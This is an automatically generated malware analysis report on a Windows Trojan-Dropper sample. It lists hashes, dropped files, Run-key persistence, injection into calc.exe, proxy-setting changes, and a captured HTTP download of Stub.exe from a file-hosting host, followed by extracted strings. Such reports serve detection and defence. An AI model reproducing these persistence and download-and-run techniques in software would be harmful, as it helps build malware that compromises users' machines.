Trojan-Dropper.Win32.Polymorph1_2a27da8827

by malwarelabrobot on April 25th, 2017 in Malware Descriptions.

Trojan.GenericKD.4670195 (BitDefender), Worm:Win32/Rebhip.Y (Microsoft), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), DDoS.MP.16 (DrWeb), Trojan.GenericKD.4670195 (B) (Emsisoft), Artemis!2A27DA88274B (McAfee), Trojan.Win32.Llac (Ikarus), Trojan.GenericKD.4670195 (FSecure), Atros5.AADC (AVG), Win32:Malware-gen (Avast), TROJ_GEN.R047C0RDC17 (TrendMicro), Trojan.Win32.Ceatrg.FD, mzpefinder_pcap_file.YR, TrojanDropperPolymorph1.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Worm, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 2a27da88274b61a22697fa631e5c40a1
SHA1: 6d7593a080ccc1be73a0e26f849d83367c673246
SHA256: 20c4ad8b0315f621b4e4014878d8ec08cad23bfe0c4c7c38f842f5b81ff5bc86
SSDeep: 49152:EbuprsA/ARYvVUjl6VSuQIa2l7AAP8Scyyme3KU26hBnB nUS/VmZKzgQQun7cvY:Ebu5f4z6VpzRpRe7BM
Size: 5042085 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-03-24 16:11:42
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan-Dropper creates the following process(es):

%original file name%.exe:3308
Fuck.exe:2740
Adobe.exe:1464
Adobe.exe:4032
Adobe.exe:2220
Minecraft PremiumV2.4.exe:308
RoamingJava.exe:2944

The Trojan-Dropper injects its code into the following process(es):

calc.exe:1072

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:3308 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Minecraft PremiumV2.4.exe (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\dnserrordiagoff_webOC[1] (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\RoamingJava.exe (148 bytes)

The process Fuck.exe:2740 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe (72 bytes)

The process Adobe.exe:1464 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp (36 bytes)

The process Minecraft PremiumV2.4.exe:308 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MINECRAFT PREMIUMV2.EXE (50 bytes)

The process RoamingJava.exe:2944 makes changes in the file system.
The Trojan-Dropper creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Fuck.exe (72 bytes)

Registry activity

The process calc.exe:1072 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process %original file name%.exe:3308 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS]
"EnableFileTracing" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASAPI32]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\2a27da88274b61a22697fa631e5c40a1_RASMANCS]
"FileTracingMask" = "4294901760"

"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

The process Fuck.exe:2740 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Adobe.exe:1464 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe"

The process Adobe.exe:4032 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe"

The process Adobe.exe:2220 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan-Dropper adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Adobe" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe"

The process Minecraft PremiumV2.4.exe:308 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process RoamingJava.exe:2944 makes changes in the system registry.
The Trojan-Dropper creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan-Dropper deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFavoritesInitialSelection"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Internet Explorer\LowRegistry]
"AddToFeedsInitialSelection"

Dropped PE files

MD5 File path
8577b41d8a86300af1f3387bb06241a6 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Fuck.exe
ced0bccc20475c129d01ababccb33403 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\MINECRAFT PREMIUMV2.EXE
c35390731bd726f8c8d2f1ce45808345 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Minecraft PremiumV2.4.exe
915c8176605428cd55a6752f8e0b16b5 c:\Users\"%CurrentUserName%"\AppData\RoamingJava.exe
8577b41d8a86300af1f3387bb06241a6 c:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe
8577b41d8a86300af1f3387bb06241a6 c:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: ejST
Product Name: ejST
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) 2017
Legal Trademarks:
Original Filename: ejST.exe
Internal Name: ejST.exe
File Version: 1.0.0.0
File Description: ejST
Comments: ejST
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 2469492 2469888 5.46516 90b4cd4231d6f379fc1d112f0cf2fb1e
.sdata 2482176 488 512 4.58383 b9cbc932f192dd03d6460c616daf0379
.rsrc 2490368 141684 141824 3.18583 d799f397497a479c91f09cc6ea5179f9
.reloc 2637824 12 512 0.070639 07625db8eb339abbcf82e207ec171188

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 1
a45b300dd2aef462fa4ef659ddda0a3f

URLs

URL IP
hxxp://store7.data.hu/get/394365/10410348/Stub.exe
hxxp://ddl7.data.hu/get/394365/10410348/Stub.exe 217.65.97.33


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

GET /get/394365/10410348/Stub.exe HTTP/1.1
Host: ddl7.data.hu
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Apr 2017 08:12:23 GMT
Content-Type: application/octet-stream
Content-Length: 2787392
Last-Modified: Fri, 24 Mar 2017 14:08:31 GMT
Connection: keep-alive
Content-Disposition: attachment; filename=Stub.exe
ETag: "58d5285f-2a8840"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L...P..X
..................'.........~.'.. ....'...@.. .......................@
*...........@.................................(.'.S.....'.x)..........
......... *.......'.............................................. ....
........... ..H............text.....'.. ....'................. ..`.sda
ta..8.....'.......'.............@....rsrc...x)....'..*....'...........
..@..@.reloc....... *.......).............@..B........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................`.'.....H.......@k...I....
......P ..............................................................
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=n
eutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResour
ceSet............PADPADP....3...............lSystem.Resources.Resource
Reader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77
a5c561934e089#System.Resources.RuntimeResourceSet............fSystem.D
rawing.Icon, System.Drawing, Version=2.0.0.0, Culture=neutral, Pub
<<< skipped >>>

The Trojan-Dropper connects to the servers at the folowing location(s):

MINECRAFT PREMIUMV2.EXE_1084:

.text
`.data
.rsrc
MSVBVM60.DLL
frmLogin
RegCloseKey
RegCreateKeyExA
RegOpenKeyExA
advapi32.dll
RegOpenKeyA
RegCreateKeyA
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyExA
RegFlushKey
RegGetKeySecurity
WINMM.DLL
shell32.dll
ShellExecuteA
mciExecute
MapVirtualKeyA
keybd_event
icmp.dll
WSOCK32.DLL
imagehlp.dll
ole32.dll
GetAsyncKeyState
version.dll
kernel32.dll
wininet.dll
SHFileOperationA
shdocvw.dll
RegLoadKeyA
RegUnLoadKeyA
RegNotifyChangeKeyValue
RegQueryInfoKeyA
RegReplaceKeyA
RegRestoreKeyA
RegSaveKeyA
RegSetKeySecurity
urlmon
URLDownloadToFileA
WinExec
WinExecErrorA
VBA6.DLL
GetKeyValue
cmdOK
cmdSysInfo
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
txt_pass
cmdCancel
Login
%%-/788::=@=:887/-%%
#%--//788:::87//--%#
#%(-///7888///-(%#
#%(--///7//--(%#
!#%(--////--(%#!
"%-///888//-%"
5::=@@@@=::/
,:::=@@=:::,
-588:85-
Password
&Password:
2004:06:28 11:33:04
n.rzg
urlTEXT
MsgeTEXT
HhXXp://ns.adobe.com/xap/1.0/
<x:xapmeta xmlns:x='adobe:ns:meta/' x:xaptk='XMP toolkit 2.8.2-33, framework 1.5'>
<rdf:RDF xmlns:rdf='hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#' xmlns:iX='hXXp://ns.adobe.com/iX/1.0/'>
<rdf:Description about='uuid:319bd9b1-c931-11d8-a978-e88c36bed731'
xmlns:xapMM='hXXp://ns.adobe.com/xap/1.0/mm/'>
<xapMM:DocumentID>adobe:docid:photoshop:319bd9af-c931-11d8-a978-e88c36bed731</xapMM:DocumentID>
M0%Xy
-KK9}N
.Fr:i
-.jj)
*:!?:7>7
=%UUmn
.MDW7h
vu.ww
2004:07:02 00:38:05
<rdf:Description about='uuid:94df19c4-cbfa-11d8-aebf-d36903ae7d96'
<xapMM:DocumentID>adobe:docid:photoshop:94df19c2-cbfa-11d8-aebf-d36903ae7d96</xapMM:DocumentID>
M.WoP
%F?#%,
.lywn
p.ec"]Zja
G:\K{
n.monu
7.Kan
2004:07:02 23:26:39
&3.oUfK
<rdf:Description about='uuid:15512a58-ccb4-11d8-987f-83d5623b4ac8'
<xapMM:DocumentID>adobe:docid:photoshop:15512a56-ccb4-11d8-987f-83d5623b4ac8</xapMM:DocumentID>
E)i%1x
.Pu'a
XF%FrZ
u.cX-
)P.is
v5.ju
.LwYJ&
abhishekspjc@gmail.com
KeyRoot
KeyName
SubKeyRef
KeyVal
*.exe
$%&()[]{}
thepassword
83636323
34533453
33435333733313334443
83339333
5363637313633353
6463636354639343
0323334364230323
5463536303736443
0353444353434353
435353536443
44634373
332333233323
43330373836303735423
3443235353535423
34634463437383635423
03232453032303230323
44530323
0373836303735423
53332333
23432333
4373837343735423
4373136323635423
9363546393635423
6363546393635423
4463437383635423
33330373836303735423
0373337313635423
337314635423
33435333
93734463446353734363
4433344323535353
33337333
33436333
335364434343
63331333335364434343
03330333
0333033303330333
63331333544393437353
6333133344430353
2333333344430353
23333333544393437353
23333333335364434343
63331333233333536443
23333333233333536443
43535443
23333333735343535443
23535343834343536443
033353438343
233353438343
34531433
0323443303233373
83436323
0323443303233363
53432333
13433333
643364336433
5333433323333333
Password missing
\MSINFO32.EXE
Please enter password.
Select Pass from Custom
Invalid password.
Invalid password or Id.
PROVIDER=Microsoft.Jet.OLEDB.4.0;
\Database\Library.mdb;Jet OLEDB:Database Password=Library;
PROVIDER=Microsoft.Jet.OLEDB.4.0;Data Source=
select Dayslimit,Fratepday,Maxhold,Pass,Refcopy,Salnew,Salper,Saltemp,Splashtime,Viewe,Welcometime from Custom
administerpass
2.0.0.0
Encrypter.exe
WindowsApp1
1.0.0.0

Adobe.exe_1464:

.idata
.rdata
P.reloc
P.rsrc
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
Windows 8
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.7 Safari/532.2
Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.0.3) Gecko/20060426 Firefox/1.5.0.3
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
Mozilla/5.0 (Windows NT 6.0; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.168 Safari/535.19
co.uk
POST / HTTP/1.
HEAD / HTTP/1.
/ HTTP/1.
Content-Type: application/x-www-form-urlencoded
Microsoft\WinNT.tmp
calc.exe
127.0.0.1
encpassword
C:\Users\"%CurrentUserName%"\AppData\Roaming\Adobe.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\WinNT.tmp
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
wsock32.dll
shfolder.dll
shell32.dll
ShellExecuteA
urlmon.dll
URLDownloadToFileA
MPHTTP
KWindows
MPUDP

calc.exe_1072:

.text
`.data
.rsrc
@.reloc
SHELL32.dll
SHLWAPI.dll
gdiplus.dll
ADVAPI32.dll
ntdll.DLL
OLEAUT32.dll
UxTheme.dll
ole32.dll
COMCTL32.dll
KERNEL32.dll
USER32.dll
RPCRT4.dll
WINMM.dll
VERSION.dll
GDI32.dll
msvcrt.dll
j.KXK
FTPWSjr
FtPWSjP
SSShG
.u&SSh
Invalid parameter passed to C runtime function.
WindowsCodecs.dll
ntdll.dll
ShellExecuteExW
GdiplusShutdown
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegCreateKeyExW
RegCloseKey
GetProcessHeap
EnumChildWindows
EnumDesktopWindows
GetKeyState
__crtGetStringTypeW
__crtLCMapStringW
_acmdln
_amsg_exit
calc.pdb
name="Microsoft.Windows.Shell.calc"
version="5.1.0.0"
<description>Windows Shell</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
KEYWp
>6441111,5
.Zu,]
>z.jO`
.nsEm
5Url]GOqE
6"%CM
B<$$.HpB
W.Ft6#
9 9(9-949@9
5(5.575=5
99x9
; ;%; ;1;
<%<*<0<6<
5%5S5
^[\ \-]?{\d*}\%c?{\d*}(e[\ \-]?{\d*})?\b*$
USER32.DLL
hXXp://VVV.microsoft.com/applets/calc/templates/v1
xmlns:calcTemplate='hXXp://VVV.microsoft.com/applets/calc/templates/v1'
\StringFileInfo\xx\OriginalFilename
\sppsvc.exe
\slui.exe
\sppuinotify.dll
imageres.dll
datetime_operation
Software\Microsoft\Windows\CurrentVersion\Applets\
mshelp://windows/?id=f15f7d3e-ee9c-465a-a7e8-4e6af5cfee5d
ErrorCode: %d, Line: %d Column: %d; Error: %s
^{[\ \-]?}{\d*\%c?\d*}({e}[\ \-]?{\d*})?$
kernel32.dll
Microsoft-Windows-Calculator/Diagnostic
Microsoft-Windows-Calculator/Debug
Windows Calculator
6.1.7601.17514 (win7sp1_rtm.101119-1850)
CALC.EXE
Windows
Operating System
6.1.7601.17514

calc.exe_1072_rwx_00400000_00011000:

.idata
.rdata
P.reloc
P.rsrc
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Windows 2000
Windows XP
Windows Server 2003
Windows Server 2003 R2
Windows Vista
Windows Server 2008
Windows Server 2008 R2
Windows 7
Windows 8
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46 Safari/536.5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.25 (jaunty) Firefox/3.8
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.5 Safari/534.55.3
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.52 Safari/536.5
Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pl; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.56.5 (KHTML, like Gecko) Version/5.1.6 Safari/534.56.5
